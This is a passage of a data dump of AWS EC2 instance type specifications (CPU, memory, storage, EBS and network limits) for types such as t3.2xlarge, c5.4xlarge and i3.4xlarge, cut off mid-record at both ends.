'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 
18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': 
['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': 
{'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 
347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': 
{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 160, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 
0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.4xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 160, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 
'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': 
{'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 
'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 400, 'Disks': [{'SizeInGB': 400, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 
'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 400, 'Disks': [{'SizeInGB': 400, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 4750, 'BaselineThroughputInMBps': 593.75, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 
'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 124928, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 124928}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 
3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 16000}, 'NvmeSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2000, 'BaselineThroughputInMBps': 250.0, 'BaselineIops': 16000, 'MaximumBandwidthInMbps': 2000, 'MaximumThroughputInMBps': 250.0, 'MaximumIops': 16000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 
